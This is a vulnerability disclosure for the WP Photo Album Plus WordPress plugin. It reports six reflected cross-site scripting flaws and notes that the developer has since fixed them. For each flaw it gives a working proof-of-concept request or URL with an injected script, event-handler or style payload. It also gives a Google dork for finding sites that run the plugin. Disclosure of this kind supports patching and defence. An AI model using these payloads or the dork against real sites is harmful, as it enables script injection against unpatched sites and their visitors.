WP Photo Album Plus Security Vulnerabilities Author: Milhouse Download: https://wordpress.org/plugins/wp-photo-album-plus/ Home Page: http://wppa.opajaap.nl/ Google dork: inurl:wp-content/plugins/wp-photo-album-plus Set up: Wordpress Version: 3.9.1, 3.9.2 WP Photo Album Plus version: 5.4.4, 5.4.3 Client browsers: FireFox 31, Internet Explorer 8-11 Issue number 1: A Cross-Site Scripting (reflective) vulnerability. Details: The plugin echoes the value of the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. Severity: Low Proof of Concept (POC): Request: GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a--><script>alert(1)</script>0aa96 Accept-Encoding: gzip, deflate Host: <vulnerablesite.example> DNT: 1 Proxy-Connection: Keep-Alive Pragma: no-cache Issue number 2: A Cross-site Scripting (reflective)vulnerability. Details: The value of the wppa-album parameter is inserted into a java script string. A supplied payload in the wppa-album parameter is echoed back unmodified to the client browser. Severity: High Proof of Concept (POC): http://vulnerablesite.example/?page_id=109&wppa- album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa- occur=1&wppa-tag= Issue number 3: Cross-Site Scripting (Reflective) Vulnerability. Severity: High Details: The supplied value of the request parameter wppa-lasten is vulnerable to cross-site scripting. By using an event handler such as “onmouseover” it is possible to insert arbitrary JavaScript into the page. Proof of concept (POC): http://vulnerablesite.example/?wppa-occur=1&wppa- lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa- album=0&wppa-photo=2 Issue number 4: Cross-Site Scripting (Refective) vulnerability Severity: High Details: The value supplied to the wppa-searchstring parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response. Proof of Concept (POC): http://vulnerablesite.example/?page_id=110&wppa-search-submit=wppa-search- submit%3dSearch&wppa- searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert (1)"3b512b44ea8&wppa-searchroot= Issue number 5: Cross-Site Scripting (reflective) Severity: High Details: This is similar to issue three. The value supplied to the wppa-topten parameter is inserted into the value of a HTML tag attribute. By using an event handler such as “onmouseover” it is possible to inject arbitrary JavaScript into the page. Proof of Concept: http://vulnerablesite.example/?wppa-occur=1&wppa- topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa- album=0&wppa-photo=2 Issue: Cross-Site Scripting (Reflective) Vulnerability. Severity: High Detail: This is similar to issue number four. The value supplied to the s (search) parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response. The plugin seems to use the value of s (search) for the same value of wppa-searchstring. Proof of Concept: http://vulnerablesite.example/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2 )"onbegin%3d"alert(1)"3924b Resolution: Developer fixed the issues immediately after disclosure. Update the plugin to the latest version.